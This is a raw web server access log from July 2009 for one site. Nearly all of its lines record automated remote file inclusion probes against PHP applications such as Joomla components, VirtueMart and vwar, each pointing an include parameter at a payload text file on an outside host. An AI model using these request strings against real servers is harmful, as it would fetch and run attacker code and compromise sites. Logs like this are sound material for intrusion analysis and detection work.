222.162.115.67 - - [26/Jul/2009:12:22:17 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:22:17 -0700] "GET /logs/access_080513.log%20%20//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.183 - - [26/Jul/2009:12:22:20 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.183 - - [26/Jul/2009:12:22:20 -0700] "GET /logs/access_080819.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.183 - - [26/Jul/2009:12:22:20 -0700] "GET /logs/access_080616.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.183 - - [26/Jul/2009:12:22:20 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:22:23 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:22:23 -0700] "GET /logs/access_080513.log%20%20//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:22:23 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
131.203.76.246 - - [26/Jul/2009:12:23:03 -0700] "GET /logs/access_090503.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
131.203.76.246 - - [26/Jul/2009:12:23:15 -0700] "GET /logs/access_090503.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.166 - - [26/Jul/2009:12:23:48 -0700] "GET /logs/access_080616.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.166 - - [26/Jul/2009:12:23:51 -0700] "GET /logs/access_080819.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:23:55 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:23:55 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:23:55 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:23:56 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:24:04 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:24:05 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:24:05 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:24:05 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:12:24:14 -0700] "GET /logs/access_090528.log%20%20/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:12:24:15 -0700] "GET /logs/access_080925.log%20%20/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:12:24:15 -0700] "GET /index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:12:24:15 -0700] "GET /logs/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.183 - - [26/Jul/2009:12:24:16 -0700] "GET /logs/access_080616.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.183 - - [26/Jul/2009:12:24:17 -0700] "GET /logs/access_080819.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:12:24:18 -0700] "GET /index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:12:24:19 -0700] "GET /logs/access_090528.log%20%20/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:12:24:19 -0700] "GET /logs/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:12:24:25 -0700] "GET /logs/access_080925.log%20%20/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:12:24:55 -0700] "GET /logs/access_080409.log/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:12:24:55 -0700] "GET /logs/access_080708.log/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:25:30 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:25:30 -0700] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:25:31 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:25:38 -0700] "GET /logs/access_080308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:25:38 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:25:38 -0700] "GET /logs/access_080919.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:25:38 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:25:38 -0700] "GET /logs/access_080308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:25:38 -0700] "GET /logs/access_080919.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:25:38 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:25:38 -0700] "GET /logs/access_080308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:25:38 -0700] "GET /logs/access_080919.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:25:38 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:25:38 -0700] "GET /logs/access_080919.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:25:38 -0700] "GET /logs/access_080308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:12:26:08 -0700] "GET /logs/access_080613.log//tools/errors.php?error=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:12:26:52 -0700] "GET /logs/access_090213.log%20%20/index.php?pg=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:12:26:52 -0700] "GET /logs/index.php?pg=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:12:26:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
219.232.224.65 - - [26/Jul/2009:12:26:58 -0700] "GET /include/lib.inc.php?site_path=http://www.porn-free.org/images/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.232.224.65 - - [26/Jul/2009:12:26:58 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.porn-free.org/images/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.232.224.65 - - [26/Jul/2009:12:26:58 -0700] "GET /logs/access_080919.log%20%20//include/lib.inc.php?site_path=http://www.porn-free.org/images/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.232.224.65 - - [26/Jul/2009:12:26:58 -0700] "GET /logs/access_080906.log%20%20//include/lib.inc.php?site_path=http://www.porn-free.org/images/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:12:27:09 -0700] "GET /index.php?pg=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 200 21004 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:27:41 -0700] "GET /logs/access_080314.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:27:42 -0700] "GET /logs/access_080314.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:27:42 -0700] "GET /logs/access_080111.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:12:28:13 -0700] "GET /logs/access_081018.log%20%20/index.php?pg=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:29:01 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:29:01 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:29:01 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [26/Jul/2009:12:29:01 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.newtech-bg.com/administrator/images/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:12:29:47 -0700] "GET /logs/access_090213.log/index.php?pg=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.80.23.97 - - [26/Jul/2009:12:29:51 -0700] "PUT /index.txt HTTP/1.0" 401 395 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:12:30:29 -0700] "GET /logs/access_081018.log/index.php?pg=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:32:02 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:32:02 -0700] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:32:05 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:32:08 -0700] "GET /logs/access_080330.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.87.105 - - [26/Jul/2009:12:32:39 -0700] "GET /bikes/dteel/?D=A HTTP/1.0" 200 5230 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:32:50 -0700] "GET /logs/access_080318.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:32:52 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:32:52 -0700] "GET /logs/access_090626.log%20%20//inc/header.php/step_one.php?server_inc=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:32:52 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:32:57 -0700] "GET /logs/access_081122.log%20%20//inc/header.php/step_one.php?server_inc=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:33:12 -0700] "GET /logs/access_080318.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.232.224.65 - - [26/Jul/2009:12:33:37 -0700] "GET /logs/access_080906.log//include/lib.inc.php?site_path=http://www.porn-free.org/images/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:35:15 -0700] "GET /logs/access_090626.log//inc/header.php/step_one.php?server_inc=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:35:18 -0700] "GET /logs/access_081122.log//inc/header.php/step_one.php?server_inc=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:36:12 -0700] "GET /logs/access_080919.log//inc/header.php/step_one.php?server_inc=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:12:36:13 -0700] "GET /logs/access_080410.log//inc/header.php/step_one.php?server_inc=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:40:05 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:40:05 -0700] "GET /logs/access_090505.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:40:05 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:06 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:06 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:06 -0700] "GET /logs/access_080330.log//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:07 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:07 -0700] "GET /logs/access_080330.log//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:08 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:08 -0700] "GET /logs/access_080330.log//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:11 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:11 -0700] "GET /logs/access_080330.log//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:11 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.53.98 - - [26/Jul/2009:12:40:14 -0700] "GET /logs/access_080621.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://solarboyz.co.za/images/avatar/files/scan/feelz/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:38 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:38 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:38 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:38 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:38 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:38 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:44 -0700] "GET /logs/access_090419.log%20%20//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:48 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:49 -0700] "GET /logs/access_090419.log%20%20//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:50 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:50 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:50 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:53 -0700] "GET /logs/access_080330.log//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:54 -0700] "GET /skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:54 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [26/Jul/2009:12:40:54 -0700] "GET /logs/access_090418.log//skin/zero_vote/error.php?dir=http://www.princedent.com/bbs/x/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
